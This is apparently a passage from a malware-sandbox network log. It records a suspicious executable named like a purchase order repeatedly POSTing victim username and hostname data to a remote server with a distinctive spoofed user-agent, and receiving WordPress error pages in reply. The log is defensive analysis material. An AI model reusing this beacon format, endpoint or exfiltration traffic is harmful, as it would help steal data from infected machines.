                        Aug 29, 2024 12:04:12.157633066 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:12.157644987 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:12.157653093 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.849753104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:12.547591925 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:12.552431107 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:14.839831114 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:13 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:14.839951038 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:14.840116024 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.849754104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:15.288630962 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:15.293513060 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:17.573535919 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:15 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:17.573556900 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:17.573570013 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:17.573582888 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.849755104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:17.715063095 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:17.720150948 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:19.961350918 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:18 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:19.961375952 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:19.961385965 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:19.961400032 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.849756104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:20.109291077 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:20.114259005 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:22.379086971 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:20 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:22.379106998 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Aug 29, 2024 12:04:22.379118919 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Aug 29, 2024 12:04:22.379134893 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.2.849757104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:22.529500961 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 470C3A50
                        Content-Length: 153
                        Connection: close
                        Aug 29, 2024 12:04:22.534398079 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
                        Aug 29, 2024 12:04:25.029134035 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Thu, 29 Aug 2024 10:04:23 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Aug 29, 2024 12:04:25.029160976 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Aug 29, 2024 12:04:25.029174089 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.849758104.248.205.66802940C:\Users\user\Desktop\PO-0Y9005373R664.exe
                        TimestampBytes transferredDirectionData
                        Aug 29, 2024 12:04:25.186475992 CEST245OUTPOST /index.php/17008709 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 104.248.205.66
                        Accept: */*
